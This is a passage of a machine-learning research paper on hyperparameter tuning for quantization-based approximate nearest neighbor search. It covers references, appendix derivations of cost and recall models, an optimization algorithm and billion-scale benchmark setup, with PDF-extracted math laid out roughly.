+ We would like to thank David Applegate, Sara Ahmadian, and Aaron Archer for generously providing
730
+ their expertise in the field of optimization.
731
+ REFERENCES
732
+ Alexandr Andoni and Ilya Razenshteyn. Optimal data-dependent hashing for approximate near
733
+ neighbors. In Proceedings of the Forty-Seventh Annual ACM Symposium on Theory of Computing,
734
+ STOC ’15, pp. 793–801, New York, NY, USA, 2015. Association for Computing Machinery.
735
+ ISBN 9781450335362. doi: 10.1145/2746539.2746553. URL https://doi.org/10.1145/
736
+ 2746539.2746553.
737
+ Martin Aumüller, Erik Bernhardsson, and Alexander Faithfull.
738
+ Ann-benchmarks: A bench-
739
+ marking tool for approximate nearest neighbor algorithms. Information Systems, 87:101374,
740
+ 2020. ISSN 0306-4379. doi: https://doi.org/10.1016/j.is.2019.02.006. URL https://www.
741
+ sciencedirect.com/science/article/pii/S0306437918303685.
742
+ Artem Babenko and Victor Lempitsky. Tree quantization for large-scale similarity search and
743
+ classification. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition
744
+ (CVPR), June 2015.
745
+ Kirell Benzi, Vassiiis Kalofolias, Xavier Bresson, and Pierre Vandergheynst. Song recommendation
746
+ with non-negative matrix factorization and graph total variation. In 2016 IEEE International
747
+ Conference on Acoustics, Speech and Signal Processing (ICASSP), pp. 2439–2443, 2016. doi:
748
+ 10.1109/ICASSP.2016.7472115.
749
+ James Bergstra, Rémi Bardenet, Yoshua Bengio, and Balázs Kégl.
750
+ Algorithms for hyper-
751
+ parameter optimization. In J. Shawe-Taylor, R. Zemel, P. Bartlett, F. Pereira, and K.Q. Wein-
752
+ berger (eds.), Advances in Neural Information Processing Systems, volume 24. Curran Asso-
753
+ ciates, Inc., 2011. URL https://proceedings.neurips.cc/paper/2011/file/
754
+ 86e8f7ab32cfd12577bc2619bc635690-Paper.pdf.
755
+ Nitin Bhatia and Vandana. Survey of nearest neighbor techniques. International Journal of Computer
756
+ Science and Information Security, 8, 07 2010.
757
+ Tolga Bozkaya and Meral Ozsoyoglu. Distance-based indexing for high-dimensional metric spaces.
758
+ In Proceedings of the 1997 ACM SIGMOD International Conference on Management of Data,
759
+ SIGMOD ’97, pp. 357–368, New York, NY, USA, 1997. Association for Computing Machinery.
760
+ ISBN 0897919114. doi: 10.1145/253260.253345. URL https://doi.org/10.1145/
761
+ 253260.253345.
762
+ Qi Chen, Bing Zhao, Haidong Wang, Mingqin Li, Chuanjie Liu, Zengzhong Li, Mao Yang, and
763
+ Jingdong Wang. Spann: Highly-efficient billion-scale approximate nearest neighborhood search.
764
+ In M. Ranzato, A. Beygelzimer, Y. Dauphin, P.S. Liang, and J. Wortman Vaughan (eds.), Ad-
765
+ vances in Neural Information Processing Systems, volume 34, pp. 5199–5212. Curran Asso-
766
+ ciates, Inc., 2021. URL https://proceedings.neurips.cc/paper/2021/file/
767
+ 299dc35e747eb77177d9cea10a802da2-Paper.pdf.
768
+ Paolo Cremonesi, Yehuda Koren, and Roberto Turrin. Performance of recommender algorithms on
769
+ top-n recommendation tasks. In Proceedings of the Fourth ACM Conference on Recommender
770
+ Systems, RecSys ’10, pp. 39–46, New York, NY, USA, 2010. Association for Computing Machinery.
771
+ ISBN 9781605589060. doi: 10.1145/1864708.1864721. URL https://doi.org/10.1145/
772
+ 1864708.1864721.
773
+ Criteo. Autofaiss: Automatically create faiss knn indices with the most optimal similarity search
774
+ parameters., 2021. URL https://github.com/criteo/autofaiss.
775
+ Mayur Datar, Nicole Immorlica, Piotr Indyk, and Vahab S. Mirrokni. Locality-sensitive hashing
776
+ scheme based on p-stable distributions. In Proceedings of the Twentieth Annual Symposium
777
+ on Computational Geometry, SCG ’04, pp. 253–262, New York, NY, USA, 2004. Association
778
+ for Computing Machinery. ISBN 1581138857. doi: 10.1145/997817.997857. URL https:
779
+ //doi.org/10.1145/997817.997857.
780
+ 10
781
+
782
+ Cong Fu, Chao Xiang, Changxu Wang, and Deng Cai. Fast approximate nearest neighbor search with
783
+ the navigating spreading-out graph. Proc. VLDB Endow., 12(5):461–474, jan 2019. ISSN 2150-
784
+ 8097. doi: 10.14778/3303753.3303754. URL https://doi.org/10.14778/3303753.
785
+ 3303754.
786
+ Beat Gfeller, Blaise Aguera-Arcas, Dominik Roblek, James David Lyon, Julian James Odell, Kevin
787
+ Kilgour, Marvin Ritter, Matt Sharifi, Mihajlo Velimirovi´c, Ruiqi Guo, and Sanjiv Kumar. Now
788
+ playing: Continuous low-power music recognition. In NIPS 2017 Workshop: Machine Learning
789
+ on the Phone, 2017.
790
+ Daniel Golovin, Benjamin Solnik, Subhodeep Moitra, Greg Kochanski, John Karro, and D. Sculley.
791
+ Google vizier: A service for black-box optimization. In Proceedings of the 23rd ACM SIGKDD
792
+ International Conference on Knowledge Discovery and Data Mining, KDD ’17, pp. 1487–1495,
793
+ New York, NY, USA, 2017. Association for Computing Machinery. ISBN 9781450348874. doi:
794
+ 10.1145/3097983.3098043. URL https://doi.org/10.1145/3097983.3098043.
795
+ Ruiqi Guo, Philip Sun, Erik Lindgren, Quan Geng, David Simcha, Felix Chern, and Sanjiv Kumar.
796
+ Accelerating large-scale inference with anisotropic vector quantization. In Hal Daumé III and Aarti
797
+ Singh (eds.), Proceedings of the 37th International Conference on Machine Learning, volume 119
798
+ of Proceedings of Machine Learning Research, pp. 3887–3896. PMLR, 13–18 Jul 2020. URL
799
+ https://proceedings.mlr.press/v119/guo20h.html.
800
+ Kelvin Guu, Kenton Lee, Zora Tung, Panupong Pasupat, and Ming-Wei Chang. Realm: Retrieval-
801
+ augmented language model pre-training. In Proceedings of the 37th International Conference on
802
+ Machine Learning, ICML’20. JMLR.org, 2020.
803
+ Masajiro Iwasaki and Daisuke Miyazaki. Optimization of indexing based on k-nearest neighbor
804
+ graph for proximity search in high-dimensional data. CoRR, abs/1810.07355, 2018. URL http:
805
+ //arxiv.org/abs/1810.07355.
806
+ Jeff Johnson, Matthijs Douze, and Hervé Jégou. Billion-scale similarity search with gpus. IEEE
807
+ Transactions on Big Data, 7(3):535–547, 2021. doi: 10.1109/TBDATA.2019.2921572.
808
+ Herve Jégou, Matthijs Douze, and Cordelia Schmid. Product quantization for nearest neighbor search.
809
+ IEEE Transactions on Pattern Analysis and Machine Intelligence, 33(1):117–128, 2011. doi:
810
+ 10.1109/TPAMI.2010.57.
811
+ Urvashi Khandelwal, Omer Levy, Dan Jurafsky, Luke Zettlemoyer, and Mike Lewis. Generalization
812
+ through memorization: Nearest neighbor language models. In 8th International Conference on
813
+ Learning Representations, ICLR 2020, Addis Ababa, Ethiopia, April 26-30, 2020. OpenReview.net,
814
+ 2020. URL https://openreview.net/forum?id=HklBjCEKvH.
815
+ Nikita Kitaev, Lukasz Kaiser, and Anselm Levskaya. Reformer: The efficient transformer. In
816
+ 8th International Conference on Learning Representations, ICLR 2020, Addis Ababa, Ethiopia,
817
+ April 26-30, 2020. OpenReview.net, 2020. URL https://openreview.net/forum?id=
818
+ rkgNKkHtvB.
819
+ Erik Lindgren, Sashank Reddi, Ruiqi Guo, and Sanjiv Kumar. Efficient training of retrieval models
820
+ using negative cache. In M. Ranzato, A. Beygelzimer, Y. Dauphin, P.S. Liang, and J. Wortman
821
+ Vaughan (eds.), Advances in Neural Information Processing Systems, volume 34, pp. 4134–
822
+ 4146. Curran Associates, Inc., 2021. URL https://proceedings.neurips.cc/paper/
823
+ 2021/file/2175f8c5cd9604f6b1e576b252d4c86e-Paper.pdf.
824
+ Rui Liu, Tianyi Wu, and Barzan Mozafari. A bandit approach to maximum inner product search.
825
+ Proceedings of the AAAI Conference on Artificial Intelligence, 33(01):4376–4383, Jul. 2019.
826
+ doi: 10.1609/aaai.v33i01.33014376. URL https://ojs.aaai.org/index.php/AAAI/
827
+ article/view/4348.
828
+ Yu A. Malkov and D. A. Yashunin. Efficient and robust approximate nearest neighbor search
829
+ using hierarchical navigable small world graphs. IEEE Trans. Pattern Anal. Mach. Intell., 42
830
+ (4):824–836, apr 2020. ISSN 0162-8828. doi: 10.1109/TPAMI.2018.2889473. URL https:
831
+ //doi.org/10.1109/TPAMI.2018.2889473.
832
+ 11
833
+
834
+ Alexander May and Ilya Ozerov. On computing nearest neighbors with applications to decoding
835
+ of binary linear codes. In Elisabeth Oswald and Marc Fischlin (eds.), Advances in Cryptology –
836
+ EUROCRYPT 2015, pp. 203–228, Berlin, Heidelberg, 2015. Springer Berlin Heidelberg. ISBN
837
+ 978-3-662-46800-5.
838
+ Antoine Miech, Jean-Baptiste Alayrac, Ivan Laptev, Josef Sivic, and Andrew Zisserman. Thinking
839
+ fast and slow: Efficient text-to-visual retrieval with transformers. In Proceedings of the IEEE/CVF
840
+ Conference on Computer Vision and Pattern Recognition (CVPR), pp. 9826–9836, June 2021.
841
+ Parikshit Ram and Alexander G. Gray.
842
+ Maximum inner-product search using cone trees.
843
+ In
844
+ Proceedings of the 18th ACM SIGKDD International Conference on Knowledge Discovery
845
+ and Data Mining, KDD ’12, pp. 931–939, New York, NY, USA, 2012. Association for Com-
846
+ puting Machinery. ISBN 9781450314626. doi: 10.1145/2339530.2339677. URL https:
847
+ //doi.org/10.1145/2339530.2339677.
848
+ Jie Ren, Minjia Zhang, and Dong Li. Hm-ann: Efficient billion-point nearest neighbor search on
849
+ heterogeneous memory. In H. Larochelle, M. Ranzato, R. Hadsell, M.F. Balcan, and H. Lin (eds.),
850
+ Advances in Neural Information Processing Systems, volume 33, pp. 10672–10684. Curran As-
851
+ sociates, Inc., 2020. URL https://proceedings.neurips.cc/paper/2020/file/
852
+ 788d986905533aba051261497ecffcbb-Paper.pdf.
853
+ Mohammad RezaAbbasifard, Bijan Ghahremani, and Hassan Naderi. A Survey on Nearest Neighbor
854
+ Search Methods. International Journal of Computer Applications, 95(25):39–52, June 2014. doi:
855
+ 10.5120/16754-7073.
856
+ Anshumali Shrivastava and Ping Li. Asymmetric lsh (alsh) for sublinear time maximum inner
857
+ product search (mips). In Z. Ghahramani, M. Welling, C. Cortes, N. Lawrence, and K.Q. Wein-
858
+ berger (eds.), Advances in Neural Information Processing Systems, volume 27. Curran Asso-
859
+ ciates, Inc., 2014. URL https://proceedings.neurips.cc/paper/2014/file/
860
+ 310ce61c90f3a46e340ee8257bc70e93-Paper.pdf.
861
+ Harsha Vardhan Simhadri, George Williams, Martin Aumüller, Matthijs Douze, Artem Babenko,
862
+ Dmitry Baranchuk, Qi Chen, Lucas Hosseini, Ravishankar Krishnaswamy, Gopal Srinivasa,
863
+ Suhas Jayaram Subramanya, and Jingdong Wang. Results of the neurips’21 challenge on billion-
864
+ scale approximate nearest neighbor search, 2022. URL https://arxiv.org/abs/2205.
865
+ 03763.
866
+ Jingdong Wang, Heng Tao Shen, Jingkuan Song, and Jianqiu Ji. Hashing for similarity search: A
867
+ survey. CoRR, abs/1408.2927, 2014. URL http://arxiv.org/abs/1408.2927.
868
+ Mengzhao Wang, Xiaoliang Xu, Qiang Yue, and Yuxiang Wang. A comprehensive survey and
869
+ experimental comparison of graph-based approximate nearest neighbor search. Proc. VLDB
870
+ Endow., 14(11):1964–1978, jul 2021. ISSN 2150-8097. doi: 10.14778/3476249.3476255. URL
871
+ https://doi.org/10.14778/3476249.3476255.
872
+ Ian En-Hsu Yen, Satyen Kale, Felix Yu, Daniel Holtmann-Rice, Sanjiv Kumar, and Pradeep Raviku-
873
+ mar. Loss decomposition for fast learning in large output spaces. In Jennifer Dy and Andreas
874
+ Krause (eds.), Proceedings of the 35th International Conference on Machine Learning, volume 80
875
+ of Proceedings of Machine Learning Research, pp. 5640–5649. PMLR, 10–15 Jul 2018. URL
876
+ https://proceedings.mlr.press/v80/yen18a.html.
877
+ 12
878
+
879
+ A
880
+ APPENDIX
881
+ A.1
882
+ LSH GUARANTEES IN PRACTICE
883
+ LSH based approaches to nearest neighbor search provide a number of rigorous guarantees regarding
884
+ memory usage and query time complexity as a function of the approximation factor c, defined as
885
+ follows: if the true nearest neighbor is a distance of d from the query, the approximate algorithm is
886
+ considered to have succeeded if it returns a point whose distance to the query is at most cd.
887
+ LSH algorithms are capable of prescribing hyperparameter settings (size and number of hash tables)
888
+ to provide optimal worst-case performance for a given value of c. To see what these hyperparameter
889
+ settings would imply for a given recall, we take a 90% recall@10 setting for Glove1M in Section 5.1
890
+ and compute the resulting c for each query, giving us 104 ratios. In Table 2 below, we plot various
891
+ statistics of these ratios and their implications for the resulting ANN hyperparameters, using the
892
+ results from Andoni & Razenshteyn (2015):
893
+ Table 2: Statistics on empirically measured c
894
+ Statistic on c
895
+ Value of c
896
+ ρ = 1/(2c2 − 1)
897
+ Space Complexity
898
+ Estimated Space
899
+ for Glove1M
900
+ Mean
901
+ 1.00262
902
+ 0.98962
903
+ O(n1.99 + nd)
904
+ 1.2TB
905
+ Median
906
+ 1
907
+ 1
908
+ O(n2 + nd)
909
+ 1.4TB
910
+ 75th Percentile
911
+ 1
912
+ 1
913
+ O(n2 + nd)
914
+ 1.4TB
915
+ 90th Percentile
916
+ 1
917
+ 1
918
+ O(n2 + nd)
919
+ 1.4TB
920
+ 99th Percentile
921
+ 1.07024
922
+ 0.77470
923
+ O(n1.77 + nd)
924
+ 60GB
925
+ We see that even if we take the 99th percentile c value, this leads to hash table hyperparameters that
926
+ result in over 60GB of memory usage, under the conservative assumption that the constant factor for
927
+ the n1.77 term is one byte. This is 128 times the size of the original dataset and already somewhat
928
+ impractical; for billions-scale datasets, this would be completely intractible.
929
+ While LSH may perform better in practice on this dataset than what the theory guarantees, and may
930
+ not need such high memory consumption to reach this level of accuracy, such a result would imply
931
+ that the hyperparameters for hashing-based ANN algorithms are difficult to tune and model, not
932
+ unlike the hyperparemter-tuning challenges that other ANN algorithms face.
933
+ A.2
934
+ FACTORIZED RECALL ASSUMPTION
935
+ Here we describe in detail the approximation 1g∈Si(q,t) ≈ 1g∈Si−1(q,t)1g∈S′
936
+ i(q,ti) used to simplify
937
+ Equation 4. The event g ∈ Si(q, t) is equivalent to requiring both g ∈ Si−1(q, t) and finding fewer
938
+ than ti points closer to q than datapoint g according to quantization i, which we can express as:
939
+ 1g∈Si(q,t) = 1g∈Si−1(q,t)1
940
+
941
+
942
+
943
+
944
+ j∈Si−1(q,t)
945
+ 1D(q, ˜
946
+ X (i)
947
+ j
948
+ )<D(q, ˜
949
+ X (i)
950
+ g
951
+ ) < ti
952
+
953
+
954
+ � .
955
+ (7)
956
+ Now define ˆSi−1(q, t) to be {1, . . . , n} \ Si−1(q, t), and consider some element j ∈ ˆSi−1(q, t). For
957
+ the following section, we assume g ∈ Si−1(q, t), which implies D(q, ˜
958
+ X (i−1)
959
+ g
960
+ ) < D(q, ˜
961
+ X (i−1)
962
+ j
963
+ ). We
964
+ split our analysis into two cases:
965
+ 1. j ̸∈ G(q); this is by far the common case, where quantization i − 1 correctly removed a
966
+ non-nearest-neighbor from the candidate set. This means quantization i − 1 has already
967
+ ranked the relative distances of j and g correctly; given that quantzation i is higher bitrate
968
+ than i−1 and is therefore even less likely to mis-rank the relative distances, we know almost
969
+ surely that D(q, ˜
970
+ X (i)
971
+ g ) < D(q, ˜
972
+ X (i)
973
+ j ).
974
+ 2. j ∈ G(q); quantization i − 1 has dropped a nearest neighbor. If we assume j and g
975
+ are picked uniformly without replacement from G(q), then with the original dataset X,
976
+ 13
977
+
978
+ P[D(q, Xg) < D(q, Xj)] = 1/2. However, at quantization ˜
979
+ X (i), we approximate that
980
+ P[D(q, ˜
981
+ X (i)
982
+ g ) < D(q, ˜
983
+ X (i)
984
+ j )] = 1 with the following justifications:
985
+ • Given that D(q, ˜
986
+ X (i−1)
987
+ g
988
+ ) < D(q, ˜
989
+ X (i−1)
990
+ j
991
+ ), g is likely closer to q than j is, so the
992
+ uniform sampling model used above for g and j leads to an underestimated probability.
993
+ • Even if j is in fact the closer neighbor, the hierarchical nature of multi-layer quantization
994
+ training implies that there is some correlation between distance mis-rankings among the
995
+ different quantization layers. If D(q, ˜
996
+ X (i−1)
997
+ g
998
+ ) < D(q, ˜
999
+ X (i−1)
1000
+ j
1001
+ ) then there is a higher
1002
+ chance that D(q, ˜
1003
+ X (i)
1004
+ g ) < D(q, ˜
1005
+ X (i)
1006
+ j ).
1007
+ Combining the results from our two cases, we see that if g ∈ Si−1(q, t), then the number of elements
1008
+ in ˆSi−1(q, t) that will rank closer to q than g according to ˜
1009
+ X (i) is approximately zero:
1010
+ 1g∈Si−1(q,t)
1011
+
1012
+ j∈ ˆ
1013
+ Si−1(q,t)
1014
+ 1D(q, ˜
1015
+ X (i)
1016
+ j
1017
+ )<D(q, ˜
1018
+ X (i)
1019
+ g
1020
+ ) ≈ 0.
1021
+ We can add this expression to Equation 7 and utilize the definition from Equation 3 to conclude
1022
+ 1g∈Si(q,t) ≈ 1g∈Si−1(q,t)1
1023
+
1024
+
1025
+
1026
+
1027
+ j∈Si−1(q,t)∪ ˆ
1028
+ Si−1(q,t)
1029
+ 1D(q, ˜
1030
+ X (i)
1031
+ j
1032
+ )<D(q, ˜
1033
+ X (i)
1034
+ g
1035
+ ) < ti
1036
+
1037
+
1038
+
1039
+ = 1g∈Si−1(q,t)1g∈S′
1040
+ i(q,ti).
1041
+ A.3
1042
+ EXTENSION OF COST MODEL TO BATCHED QUERYING
1043
+ The main speedup from query batching in quantization-based ANN algorithms arises from the fact that
1044
+ the same quantized data may be reused to score multiple queries. This conserves memory bandwidth,
1045
+ resulting in better performance, because memory bandwidth is scarce relative to arithmetic throughput
1046
+ in modern hardware. To account for this in our cost model, we first rewrite Equation 6 as
1047
+ J(t) ≜
1048
+ 1
1049
+ |X| ·
1050
+
1051
+ | ˜
1052
+ X (1)| +
1053
+ m−1
1054
+
1055
+ i=1
1056
+ ti
1057
+ n · | ˜
1058
+ X (i+1)|
1059
+
1060
+ =
1061
+ 1
1062
+ |X|
1063
+ m
1064
+
1065
+ i=1
1066
+ αi| ˜
1067
+ X (i)|
1068
+ where αi is the proportion of ˜
1069
+ X (i) that is searched; α1 = 1 and αi = ti−1/n for i > 1. The
1070
+ amount of memory bandwidth consumed in searching this quantization level for a batch of size B is
1071
+ approximately min(1, αiB)| ˜
1072
+ X (i)|, while the number of arithmetic operations performed is αiB| ˜
1073
+ X (i)|.
1074
+ Applying the roofline model to this algorithm, where we are bandwidth-bound in the small-batch
1075
+ regime and compute-bound in the large-batch regime, gives the following new cost model:
1076
+ J(t, B) ≜
1077
+ 1
1078
+ |X|
1079
+ m
1080
+
1081
+ i=1
1082
+ max(αiB/ρ, min(1, αiB))| ˜
1083
+ X (i)|
1084
+ where ρ is the ratio of the hardware’s arithmetic performance to memory bandwidth. In practice,
1085
+ query batching is of limited utility in large-scale ANN because αi is so small that the algorithm will
1086
+ still be bandwidth-limited, resulting in no performance boost.
1087
+ A.4
1088
+ SINGLE-LAYER CANDIDATE SET RECALL CURVE COMPUTATION
1089
+ Our goal is to efficiently compute Li from Equation 5, reproduced below:
1090
+ 14
1091
+
1092
+ Li(Q, ti) = Eq∈Q
1093
+
1094
+ − log |S′
1095
+ i(q, ti) ∩ G(q)|
1096
+ |G(q)|
1097
+
1098
+ .
1099
+ We want to compute this quantity for all ti ∈ {1, . . . , n} and for all quantization levels. As a
1100
+ prerequisite, we first require the ground truth G(q) for all q ∈ Q. Note this ground truth is required to
1101
+ compute the recall of any ANN algorithm and therefore should be computed regardless of whether
1102
+ our technique is used. We can store the ground truth results in a matrix G ∈ {1, . . . , n}nq×k, where
1103
+ n is the number of elements in the dataset, nq is the number of elements in the Q, and k is the number
1104
+ of neighbors we want to retrieve per query.
1105
+ Now for each ground truth element, we compute its distance from the query for every dataset
1106
+ quantization. This may be expressed as computing U ∈ Rnq×m×k where Ua,b,c = D(Qa, ˜
1107
+ X (b)
1108
+ Ga,c).
1109
+ We then sort each Ua,b so that Ua,b,c < Ua,b,c+1 for all c ∈ {1, . . . , k −1}. From U we then compute
1110
+ a matrix V ∈ Nnq×m×k where Va,b,c stores the number of distances between query Qa and ˜
1111
+ X (b) that
1112
+ are less than Ma,b,c:
1113
+ Va,b,c =
1114
+ n
1115
+
1116
+ i=1
1117
+ 1D(Qa, ˜
1118
+ X (b)
1119
+ i
1120
+ )<Ma,b,c.
1121
+ Note that because Ua,b was sorted, Va,b will be sorted as well. The entry Va,b,c indicates the search
1122
+ depths at which recall for query Qa with quantization ˜
1123
+ X (b) increase. For example, if Va,b = [1, 3, 8],
1124
+ we can conclude that recall for this query-quantization combination will be 0 when returning only
1125
+ the top 1 index, 1/3 when returning the top 2 or 3 indices, 2/3 when returning the top 3 through 7
1126
+ indices, and 1 when returning the top 8 or more indices. Once we have V , it is a simple matter of
1127
+ taking logarithms and aggregating over queries to compute Li.
1128
+ The computational bottleneck to this routine is computing V ; we must compute the query-dataset
1129
+ distance for all queries over all dataset quantizations, which takes O
1130
+
1131
+ nq
1132
+ �m
1133
+ i=1 | ˜
1134
+ X (i)|
1135
+
1136
+ time, where
1137
+ | ˜
1138
+ X (i)| denotes the memory footprint of quantization i. For each distance we must then decide how
1139
+ many of Ma,b it is less than, which takes O(log k) time per distance using binary search. We can
1140
+ estimate the number of distances as O(mn), although this is an overestimate because VQ-quantized
1141
+ layers will result in fewer than n distances being materialized. Overall, this gives our routine a
1142
+ runtime of
1143
+ O
1144
+
1145
+ nq
1146
+ m
1147
+
1148
+ i=1
1149
+ | ˜
1150
+ X (i)| + nqmn log k
1151
+
1152
+ .
1153
+ To analyze this expression further, let | ˜
1154
+ X (i)| = n · d · ri, where ri is the compression ratio for
1155
+ quantization i. Our runtime can then be expressed as O(nqn(d �m
1156
+ i=1 ri + m log k)); the first term
1157
+ tends to dominate due to the presence of d.
1158
+ This routine is relatively cheap; to compare, the computation of ground truth nearest neighbors, which
1159
+ is generally done as part of any ANN indexing routine, takes O(nqnd) time. Assuming as above that
1160
+ the first term of our runtime dominates, our routine is a multiplicative factor of �m
1161
+ i=1 ri as expensive,
1162
+ which in practice with typical quantization hierarchies is below 2.
1163
+ A.5
1164
+ FAST MINIMIZATION ALGORITHM FOR DYNAMIC LAGRANGE MULTIPLIERS
1165
+ Our goal is to quickly perform the optimization
1166
+ arg min
1167
+ t∈[0,n]m
1168
+ − λJ(t) +
1169
+ m
1170
+
1171
+ i=1
1172
+ Li(ti)
1173
+ s.t.
1174
+ t1 ≥ . . . ≥ tm.
1175
+ 15
1176
+
1177
+ quickly for dynamic values of λ, with all other inputs constant.
1178
+ We first describe the zero-
1179
+ preprocessing, O(nm) time dynamic programming solution to this problem, which we then optimize
1180
+ to arrive at our final O(m log n) approach.
1181
+ A.5.1
1182
+ BASIC DYNAMIC PROGRAMMING APPROACH
1183
+ For a fixed λ, our optimization is equivalent to selecting non-increasing indices t1, . . . , tm such that
1184
+ �m
1185
+ i=1 Mi,ti is minimized, where the matrix M ∈ Rm×n is defined as Mi,j = Li(j) − λJi(j). Now
1186
+ we define our dynamic programming subproblem as selecting the first a indices t1, . . . , ta such that
1187
+ all indices are at least equal to b. We can store these subproblem answers in another matrix M ′:
1188
+ M ′
1189
+ a,b ≜
1190
+ min
1191
+ t∈[b,n]a
1192
+ a
1193
+
1194
+ i=1
1195
+ Mi,ti
1196
+ s.t.
1197
+ t1 ≥ . . . ≥ ta.
1198
+ Using the state transition M ′
1199
+ a,b = min(M ′
1200
+ a,b+1, Ma,b + M ′
1201
+ a−1,b) allows us to compute all of M ′ and
1202
+ receive the resulting minimum, located at M ′
1203
+ m,n, in O(nm) time. The approach may be augmented
1204
+ with cost and history matrices so that J(t), � Li, and the selected indices ti may be recovered as
1205
+ well.
1206
+ A.5.2
1207
+ FASTER ALGORITHM LEVERAGING CONVEXITY
1208
+ Recall that all Li are convex, and J is linear, so every row of M is convex. Inductively, we can see
1209
+ that this leads to the rows of M ′ being convex as well, which we take advantage of to accelerate
1210
+ our algorithm. First, define j∗(i) as the rightmost index in row i achieving the row-wise minimum
1211
+ in M ′; j∗(i) = max{j : M ′
1212
+ i,j = mink M ′
1213
+ i,k}. Due to the convexity of M ′, we know that M ′
1214
+ i,j is
1215
+ strictly increasing with respect to j for all j > j∗(i). Combined with this equivalent expression for
1216
+ computing M ′,
1217
+ M ′
1218
+ a,b =
1219
+ min
1220
+ j∈{b,...,n} Ma,j + M ′
1221
+ a−1,j
1222
+ (8)
1223
+ it’s clear that M ′
1224
+ i is equivalent to Mi + M ′
1225
+ i−1 in the column range [j∗(i), n]. Meanwhile, M ′
1226
+ i,j =
1227
+ M ′
1228
+ i,j∗(i) for j < j∗(i).
1229
+ Now let’s inductively assume that M ′
1230
+ i−1 is composed of a number of piecewise components, where the
1231
+ kth component equals the sum of the most recent rk rows of M plus a constant ck and is responsible
1232
+ for the columns j ∈ [lk, rk]. From Equation 8 we can see that upon the transition from Mi−1 to M ′
1233
+ i,
1234
+ all pieces to the right of j∗(i) will be incremented by Mi. All pieces left of j∗(i) will be replaced
1235
+ with a constant offset equalling Mi,j∗(i), maintaining our inductive hypothesis. The base case for this
1236
+ hypothesis is also easily verified, as we see M ′
1237
+ 1 equals M1 in the range j ∈ [j∗(1), n], and left of that
1238
+ range it equals the constant M ′
1239
+ 1,j∗(1).
1240
+ This realization allows for faster approaches to our minimization problem by allowing M ′ to be
1241
+ implicitly represented rather than explicitly computed. We maintain the set of piecewise components
1242
+ as we traverse from row 1 to m. At each row, we have to find j∗(i) and update our set of components
1243
+ accordingly. The search for j∗(i) may be done efficiently by taking advantage of the convexity of M ′
1244
+ via binary search. We first binary search over our components to find the one containing the global
1245
+ minimum, and then binary searching among the indices belonging to that component. Computing
1246
+ the value within a component may be done in O(1) time once a prefix sum array over L and J are
1247
+ created; these data structures allow contiguous sums over M with dynamic λ. The component list
1248
+ update then takes O(1) amortized cost per row, because only one component is added per row.
1249
+ There are at most min(m + 1, n) components and any component may have a range of at most n
1250
+ indices, so the resulting minimization takes O(m log n) time. Calculating the prefix sums over L and
1251
+ J result in O(mn) preprocessing time for this algorithm.
1252
+ 16
1253
+
1254
+ ˜
1255
+ X1: Level 2 PQ
1256
+ 4 · 104 × 12 bytes; ∼ 480KB
1257
+ ˜
1258
+ X2: Level 2 Centroids (int8)
1259
+ 4 · 104 × 96 bytes; ∼ 3.84MB
1260
+ ˜
1261
+ X3: Level 1 PQ
1262
+ 4 · 106 × 16 bytes; ∼ 64MB
1263
+ ˜
1264
+ X4: Level 1 Centroids (int8)
1265
+ 4 · 106 × 96 bytes; ∼ 384MB
1266
+ ˜
1267
+ X5: Dataset PQ
1268
+ 109 × 48 bytes; ∼ 48GB
1269
+ Dataset (int8, not stored)
1270
+ 109 × 96 bytes; ∼ 96GB
1271
+ (a) DEEP1B
1272
+ ˜
1273
+ X1: Level 2 PQ
1274
+ 4 · 104 × 12.5 bytes; ∼ 500KB
1275
+ ˜
1276
+ X2: Level 2 Centroids (int8)
1277
+ 4 · 104 × 100 bytes; ∼ 4MB
1278
+ ˜
1279
+ X3: Level 1 PQ
1280
+ 4 · 106 × 17 bytes; ∼ 68MB
1281
+ ˜
1282
+ X4: Level 1 Centroids (int8)
1283
+ 4 · 106 × 100 bytes; ∼ 400MB
1284
+ ˜
1285
+ X5: Dataset PQ
1286
+ 109 × 50 bytes; ∼ 50GB
1287
+ Dataset (int8, not stored)
1288
+ 109 × 100 bytes; ∼ 100GB
1289
+ (b) Microsoft Turing-ANNS
1290
+ ˜
1291
+ X1: Level 2 PQ
1292
+ 4 · 104 × 25 bytes; ∼ 1MB
1293
+ ˜
1294
+ X2: Level 2 Centroids (int8)
1295
+ 4 · 104 × 200 bytes; ∼ 8MB
1296
+ ˜
1297
+ X3: Level 1 PQ
1298
+ 4 · 106 × 34 bytes; ∼ 136MB
1299
+ ˜
1300
+ X4: Level 1 Centroids (int8)
1301
+ 4 · 106 × 200 bytes; ∼ 800MB
1302
+ ˜
1303
+ X5: Dataset PQ
1304
+ 109 × 50 bytes; ∼ 50GB
1305
+ Dataset (int8, not stored)
1306
+ 109 × 200 bytes; ∼ 200GB
1307
+ (c) Yandex Text-to-Image
1308
+ Figure 6: Multi-level quantization hierarchies used for the three billions-scale datasets of Section 5.2.
1309
+ A.6
1310
+ BILLION-SCALE SEARCH EXPERIMENTAL SETUP DETAILS
1311
+ Track 1 of the https://big-ann-benchmarks.com competition stipulates that:
1312
+ • Query-time benchmarking is done on Azure VMs with 32 vCPUs and 64GB RAM.
1313
+ • Indexing takes place on Azure VMs with 64vCPUs, 128GB RAM, and 4TB SSD, and must
1314
+ finish within 4 days.
1315
+ Our query-time serving was performed on 16 physical cores from an Intel Cascade Lake-generation
1316
+ CPU, and peak memory usage was measured to be under 58GB. Azure counts one physical core as
1317
+ equal to 2 vCPUs, so our setup matches the competition requirements.
1318
+ For indexing time, our index was constructed via a distributed computing pipeline. For DEEP1B, the
1319
+ pipeline ran in approximately 1.5 hours and in total consumed approximately 538.0 vCPU-hours of
1320
+ compute power. Approximately 16.3 vCPU-hours, or 2.7% of the overall indexing job’s resource
1321
+ consumption, was spent on computing L for use in our convex optimization routine. Other datasets
1322
+ were comparable in runtime. They were all significantly under the 6144 vCPU-hours available under
1323
+ the competition specifications, and furthermore the VQ and PQ training involved in the pipeline have
1324
+ low peak memory and disk requirements, so our indexing procedure comfortably qualifies under the
1325
+ competition rules.
1326
+ A.6.1
1327
+ HIERARCHICAL QUANTIZATION INDEX DETAILS
1328
+ The three diagrams below describe in detail the quantization hierarchy used for the three billions-scale
1329
+ datasets in Section 5.2. We would like to emphasize that all three datasets used the same VQ and
1330
+ PQ settings–the datasets are first quantized to 4 × 106 centroids, and then again to 4 × 104 centroids.
1331
+ The PQ was performed with 16 centers (4 bits) per subspace, 4 dimensions per subspace at the X1
1332
+ level, and 3 dimensions per subspace (rounding up) at the X3 level. Only the Yandex Text-to-Image
1333
